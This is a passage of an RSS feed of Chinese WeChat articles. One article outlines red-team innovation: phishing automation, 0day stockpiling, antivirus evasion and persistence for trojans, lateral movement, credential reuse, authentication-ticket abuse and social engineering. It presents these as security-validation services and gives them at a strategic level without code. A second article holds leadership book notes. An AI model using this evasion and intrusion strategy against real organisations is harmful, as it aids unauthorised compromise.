justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"></span></p><h1 style="text-align: justify;margin-left: 0pt;text-indent: 0pt;break-after: avoid;font-size: 22pt;font-family: 等线;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><strong><span style="font-family: 等线;font-size: 24px;">三、攻防场景创新</span></strong><span style="font-family: 等线;font-size: 24px;"></span></h1><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;">网络安全的创新动力：政策、场景、业务、理念、技术、模式…</span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><img class="rich_pages wxw-img" data-ratio="0.5244122965641953" style="width:553.3400268554688px;height:290.2699890136719px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=7e891421&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe8fTAG2diawU79cNMQemmJSbibOdegBSSyn68DA2kcqEc4QLUr724s5oVg%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;">     安全是相对万金油的存在，只要场景应用够大，这个场景的安全就会更成体系化，例如云计算的普及对应云安全就很典型；零信任全方面应用后 零信任本身的安全也会比较有价值；车联网的赛道场景强化，进一步增强了车联网安全的应用，甚至基于5G 鸿蒙体系的安全会更加普遍。</span></p><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><br/></p><p style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;font-weight: bold;">整体以攻防技术为内核、赛道场景为驱动（业务逻辑辅助）、应用场景越广泛意味着这个攻防赛道价值越高。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"></span></p><h1 style="text-align: justify;margin-left: 0pt;text-indent: 0pt;break-after: avoid;font-size: 22pt;font-family: 等线;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><strong><span style="font-size: 24px;text-indent: 0pt;">四、红队实战创新</span></strong><span style="font-size: 24px;text-indent: 0pt;"></span><br/></h1><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;font-weight: bold;">实战几个问题，算不算创新？</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">实战攻防中，在内外网信息收集上花费了多少时间？还有没有提升效率的空间？</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">漏洞挖掘-0day储备，在储备的质量和数量，除了投入更多的研究员，还有哪些方法？</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">社工钓鱼，除了常规的邮件、社交、功能等形式 还有哪些可以提高准度和效率的点？</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">如何让自己的木马免杀持久性更好？而不是成为一个消耗品？（APT的马子）</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">内网过程，除了扫描还有没有更精准快速的扩大战果的手段？</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">破隔离、拿靶标？如何更高提升效率？</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">二进制在攻防实战有哪些更好的应用？</span></p><p style="line-height: 2em;"><span style="font-size: 18px;"></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"></span></p></li></ol><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;font-weight: bold;">红队创新点</span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><img class="rich_pages wxw-img" data-ratio="0.4321880650994575" style="width:553.3400268554688px;height:238.8000030517578px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=bcc3344f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe8feqX9Ey9X6ZuF7IPLL4QqvsbxDMwFV0tTqnKGT4j3ibawxDOMWbwfZA%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;">红队创新点梳理：</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="line-height: 2em;"><span style="font-size: 18px;">信息收集，基于业务资产的偏门资产组合拳，例如接口资产自动化、业务虚拟目录+Fuzz；</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">代码审计，利用多类型漏洞组合拳组合Getshell链；</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">打点，钓鱼自动化+人性化闭环；</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">木马&amp;免杀，基于业务流向的泛木马、基于自定义加密算法的魔改；</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">内网横向，基于集权的维权与发包、专有协议、业务白名单、基于协议的认证突破；</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">隔离突破&amp;靶标，基于集权&amp;边界设备的自动化精准发掘、认证突破</span></p></li></ol><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><br/></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-weight: bold;font-size: 18px;">红队vsAPT组织 重点差异-隐匿</span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><img class="rich_pages wxw-img" data-ratio="0.6419529837251357" style="width:553.3400268554688px;height:355.1400146484375px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=4fa0903f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe8o2yg1gZOnx5kEOdb3D9Q7ogMpb9GxvUd4SGZyCkVyvNxPde7J6WO9A%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;font-weight: bold;">重点归纳下靶标侧：</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="line-height: 2em;"><span style="font-size: 18px;">隔离突破：重点关注集权设备（AD k8s vcenter …）、边界设备(VPN、FW、SW)、Web应用-跨段（https 隐匿效果更佳）</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">漏洞系列：1day&amp;nday（相对比感知明显）、0day储备、临时挖day（基于临时源码&amp;闭源代码），总体来看漏洞打过后尤其RCE效果在端侧还是有动静被监测。（也要看防守人员是否针对告警做处置，例如佯装攻击批量告警后的专项攻击）</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">口令系列：密码提取&amp;复用、规律提取、密码&amp;验证码欺骗、基于社工的猜测推理</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">认证系列：基于协议、票据、认证类的突破。相对无感，毕竟都是正常行为，管理员也是这个业务流量。</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-size: 18px;">手工渗透，组合拳。（top10类组合、 web&amp;系统&amp;组件的渗透组合）</span></p></li><li style="font-size: 18px;"><p style="line-height: 2em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">基于社会工程（搞人），二次钓鱼&amp;精准钓鱼，运维管理、业务管理等</span></p></li></ol><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: justify;margin-left: 0pt;text-indent: 0pt;break-after: avoid;font-size: 22pt;font-family: 等线;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><strong><span style="font-family: 等线;font-size: 24px;">五、攻防业务创新</span></strong><span style="font-family: 等线;font-size: 24px;"></span></h1><section style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;font-family: 等线;font-weight: bold;">红队目标（初衷）回顾：</span></section><section style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;"><span style="font-family: 等线;font-weight: bold;">红队的业务目标</span><span style="font-family: 等线;">：帮助企业安全建设；专治嘴硬（不信自己能被攻破，安全建设有效性验证）</span></span></section><section style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-size: 18px;"><span style="font-family: 等线;font-weight: bold;">红队的技术目标</span><span style="font-family: 等线;">：沉淀行业攻防经验（金融、能源、互联网…），类似老中医望闻问切，然后对症下药。</span></span></section><section style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><img class="rich_pages wxw-img" data-ratio="0.4448462929475588" style="width:553.3400268554688px;height:246.1999969482422px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=669e4afb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIS29Q5tdexMhgxxaXgJKe87InhZ416lwu6X1ax0zqug96qRrws3NiaQx9tUyLd5I2x8KBWYEwnwdw%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;"><br/></span></section><section style="text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;margin-top: 0px;margin-bottom: 0px;line-height: 2em;"><span style="font-family: 等线;font-size: 18px;">赛道领域非常的多（据不完全统计，</span><a href="https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&amp;mid=2247576954&amp;idx=1&amp;sn=9cba6a5bd582b93c8541304dff18546a&amp;scene=21#wechat_redirect" style="font-family: 等线;font-size: 18px;" data-linktype="2"><span style="font-family: 等线;font-size: 18px;">2</span></a><a href="https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&amp;mid=2247576954&amp;idx=1&amp;sn=9cba6a5bd582b93c8541304dff18546a&amp;scene=21#wechat_redirect" style="font-family: 等线;font-size: 18px;" data-linktype="2"><span style="font-family: 等线;font-size: 18px;">022</span></a><a href="https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&amp;mid=2247576954&amp;idx=1&amp;sn=9cba6a5bd582b93c8541304dff18546a&amp;scene=21#wechat_redirect" style="font-family: 等线;font-size: 18px;" data-linktype="2"><span style="font-family: 等线;font-size: 18px;">年投资的细分领域2</span></a><a href="https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&amp;mid=2247576954&amp;idx=1&amp;sn=9cba6a5bd582b93c8541304dff18546a&amp;scene=21#wechat_redirect" style="font-family: 等线;font-size: 18px;" data-linktype="2"><span style="font-family: 等线;font-size: 18px;">0</span></a><a href="https://mp.weixin.qq.com/s?__biz=MzU5ODgzNTExOQ==&amp;mid=2247576954&amp;idx=1&amp;sn=9cba6a5bd582b93c8541304dff18546a&amp;scene=21#wechat_redirect" style="font-family: 等线;font-size: 18px;" data-linktype="2"><span style="font-family: 等线;font-size: 18px;">多个</span></a><span style="font-size: 18px;font-family: 等线;">：工控安全、隐私计算、开发安全、零信任、安全运营、物联网安全、区块链、公共安全、智能网联汽车、身份安全、大数据安全、云安全、密码、API安全、渗透测试、软件安全、安全合规、安全验证、威胁检测、威胁情报、攻击面管理、网络靶场、网络空间测绘、网络安全芯片、异构大数据、IP数据库等），但具体红队攻防赛道哪些可以更好的落地？</span></section><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><section style="line-height: 2em;"><span style="font-size: 18px;">攻防演练类，目前红队检测服务相对比较为成熟，还可以拓展红队专项评估，例如域安全评估、集权类专项评估（k8s、vcenter…）</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;">入侵与模拟攻击BAS</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;">云安全专项检测，本身对红队渗透有帮助，且可单独形成服务</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;">红队中，移动端的暴露面自动化探测</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;">红队中，借用api进行数据权限的获取，借助业务资产&amp;表单构造寻找偏门资产，助力信息收集的最大化，实现ASM类的增值</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;">规划建议类，红队攻防咨询、沙盘推演；</span></section></li><ol class="list-paddingleft-1" style="list-style-type: lower-alpha;"><li><section style="line-height: 2em;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">攻防咨询，基于红队检测结果，进行根因挖掘形成有效性检测建议（咨询类公司不一定好做，因为没有实际做，红队类没做总归是概念，做了就能得到验证）</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">沙盘推演，企业类不一定好组织，需要的资源相对较多。</span><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">但的确能够发掘更广泛的风险及影响，进而佐证价值点</span></section></li><li><section style="line-height: 2em;"><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"></span><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">攻防咨询基于先执行了红队，基于结果来推动；</span><span style="font-size: 18px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">沙盘有假设，不一定是（要）真打</span></section></li></ol></ol><section style="line-height: 2em;"><section style="display: none;line-height: 2em;"><br/></section></section><section style="line-height: 2em;"><section style="display: none;line-height: 2em;"><br/></section></section><section style="display: none;line-height: 2em;"><br/></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483964">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3ac13b71&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483964%26idx%3D1%26sn%3D1f06aa888edef255ab96fcea7b461882%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 10 Jan 2023 07:40:00 +0800</pubDate>
    </item>
    <item>
      <title>樊登-可复制的领导力Ⅰ&amp;Ⅱ分析与挖掘</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483936&amp;idx=1&amp;sn=56f00f0bd5b3ef635393be51619632b6</link>
      <description>团队打胜仗、GROW模型、BIC模型；让优秀的员工举一反三。“自己长出来”。</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2022-05-03 18:39</span> <span style="display: inline-block;">北京</span>
</p>

<p>团队打胜仗、GROW模型、BIC模型；让优秀的员工举一反三。“自己长出来”。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=0597703c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7mP8sOwPv2AbM4mDoV5ahhsMibKPPUzLQzicSsgEtynibdSsNVibv6K95Iw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section><br/></section><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: center;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-weight: bold;font-size: 20px;">挖掘内容</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: center;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-weight: bold;font-size: 20px;"></span><br/></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">一、团队，打胜仗</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">古代战争，王侯将相</p></li><li><p style="text-align: left;">近代：“这是命令”（只要僵持不下，长官说这一句基本都管用）</p></li><li><p style="text-align: left;">前段，团队管理靠狼性；近段，团队管理靠生长</p></li><li><p style="text-align: left;">背后的需求有共同点，<span style="color: rgb(255, 0, 0);">升级路线或者希望</span>：官级（九品？）、新希望（共同愿景）、物质回报、个人升值（市场）</p></li></ol><p style="text-align: left;"><img class="rich_pages wxw-img" data-ratio="0.6166365280289331" style="height: 341.34px;text-indent: 0pt;white-space: normal;font-family: 等线;width: 553.34px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=27ca43ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7diar9jDjy9TaR1gox3blPlkF5M3uSgvsYdwSzFFKttV983pia9x3qU4g%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: left;"><br/></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">二、物来则应，过去不留</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>情顺万物而无情，庄子对这个世界的治愈</p></li><li><p>自在无碍，所作皆成《心王铭》（扫地僧送了萧远山和慕容博几句话...）</p></li></ol><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.43191800878477304" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=c021a816&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7TMxBjJwiabIl72bxqXNW9RI2cdgrickBfk8JUTk0HeDsmnVxUH0PKJzg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;margin-bottom: 0em;"><br/></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">三、正态分布</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p>在正常的世界里，所有的事物基本都符合正态分布</p></li><li><p>疯狂世界则完全相反，其中会出现各种匪夷所思的可能性</p></li><li><p>认可这个规律和事实。高级向往，始终是正态中间峰值的少数。但也要承认曲线内上坡下坡人的价值。</p></li></ol><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;"><span style="font-family: 等线;"></span></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-left: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;"><img class="rich_pages wxw-img" data-ratio="0.7341772151898734" style="width:553.3400268554688px;height:406.2099914550781px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=0aad7684&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7apJSusEet6QUdFgcwZn7GOIuM5o3USaHRxfEEVswp24O1AicPTnSklg%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">四、归属感和价值感 – 意义</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">一个人终其一生就是不停的寻找两样东西，分别是归属感和价值感。</p></li><li><p style="text-align: left;">价值感，做这件事的意义如何？最终有价值。</p></li><li><p style="text-align: left;">呼兰脱口秀有一个，关于年轻人的工作意义。</p></li></ol><section><iframe class="video_iframe rich_pages" data-vidtype="1" data-cover="http%3A%2F%2Fshp.qpic.cn%2Fqqvideo_ori%2F0%2Fs3272tydwen_496_280%2F0" allowfullscreen="" frameborder="0" data-ratio="0.5625" data-w="720" data-src="https://v.qq.com/iframe/preview.html?width=500&amp;height=375&amp;auto=0&amp;vid=s3272tydwen" src="https://v.qq.com/iframe/preview.html?width=500&amp;height=375&amp;auto=0&amp;vid=s3272tydwen"></iframe></section><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;margin-left: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;"></span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">五、低风险创业</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">创业的意义，不是说创业就是为了上市（然后收割）后的财富自由，那样很快变得也会空虚。</p></li><li><p style="text-align: left;">创业者要清楚地知道自己的项目能够解决什么社会问题，这是创业的起点，在某种意义上也可以视为终点。</p></li><li><p style="text-align: left;">侠之大者为国为民，郭靖，学了那么多武功，为了什么呢？</p></li></ol><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family: 等线;text-indent: -21pt;"></span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">六、批判性思维</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">批判性思维是每一个人提升领导力的必经之路</p></li><li><p style="text-align: left;">只有做出和别人不一样的东西，有与别人不一样的想法。才能通过独立思考去沉淀，才会创造出价值。【差异化优势】</p></li><li><p style="text-align: left;">大脑皮层主要掌控的是我们的幽默感，幽默诙谐调侃自己也是一种坦然，直面自己的不足。</p></li></ol><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">七、反脆弱，杠铃式配置</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">推动历史的力量来自黑天鹅，脆弱性是不可避免的。——反脆弱</p></li><li><p style="text-align: left;">反脆弱里面有个概念，叫【杠铃式配置】，我把资源配置在杠铃的两头，无论环境发生什么变化，我都有所准备，并从中获益；</p></li><li><p style="text-align: left;">不要将自己局限在某一个领域，当自己被定性以后，反脆弱的能力就会消失。</p></li><li><p style="text-align: left;">通过配置保险来提高自己和家庭对风险的抵抗能力；</p></li></ol><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.40783744557329465" data-s="300,640" style="" data-type="png" data-w="1378" src="https://wechat2rss.xlab.app/img-proxy/?k=163a509e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7sVHNXWvVDCn4M03TibMrUYIKtjQldWfcDJ6ytK02suPuWFwqDDIheJA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><br/></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">八、务虚思考</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">首先说明务虚思考不是提倡人们去务虚（毕竟跟我们常规理解的务实的特点有部分冲突）。只是说在成长路上留出时间去务虚思考也很重要。（其实也算是反脆弱杠铃的另一端）</p></li><li><p style="text-align: left;">管理者需要抽调部分时去放空自己。去了解自己、去反脆弱、去突破。（每个阶段有不同的需求和目标）</p></li><li><p style="text-align: left;">每个人都是带着偏见看待这个世界的，如果你没有偏见，那么你就没有看待这个世界的方式。-- 许知远</p></li></ol><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">九、战胜贪婪与恐惧</span></p><ol class="list-paddingleft-1" style="list-style-type: decimal;"><li><p style="text-align: left;">可能这个两个词在投资市场用的较多，在股市赚钱除了金融技术分析更关键还有心理学和哲学的应用，反向操作？</p></li><li><p style="text-align: left;">对于领导力：人都有这样的弱点，一旦成功就想控制。控制既能带来成就的满足感，又能减少失控的恐惧感。</p></li><li><p style="text-align: left;">作为管理者，我们最应该做的事情就是增加组织成功的可能性，让更多的人以更大的热情做方向大致正确的事情</p></li></ol><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">十、价值观</span></p><p>        咏春第一套拳——小念头。念头不正，终身不正，习武修心，正念正行，不因外物而移，修武之路漫漫长远，不理解的声音有之、为现实所累亦有之，但无论外界如何，都不会影响心中的信仰。只要坚守自我，认真专注眼前每一刻，便能踏实笃定，无惧坎坷。朝着心中的信阳一直走下去。（阿迪达斯AD《致侠士》系列的第二篇章，以“律-原则不移”）</p><section style="white-space: normal;"><video controls="" poster="https://wechat2rss.xlab.app/img-proxy/?k=8c689fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEC7unEiaL8xodJDS5qpVGqxD0HY6hxFn8nnrVnYvXRSvfE7fxsJV1tg93FYLYDfzcgcP22nzJIQcibYUWocBe3YA%2F0%3Fwx_fmt%3Djpeg" 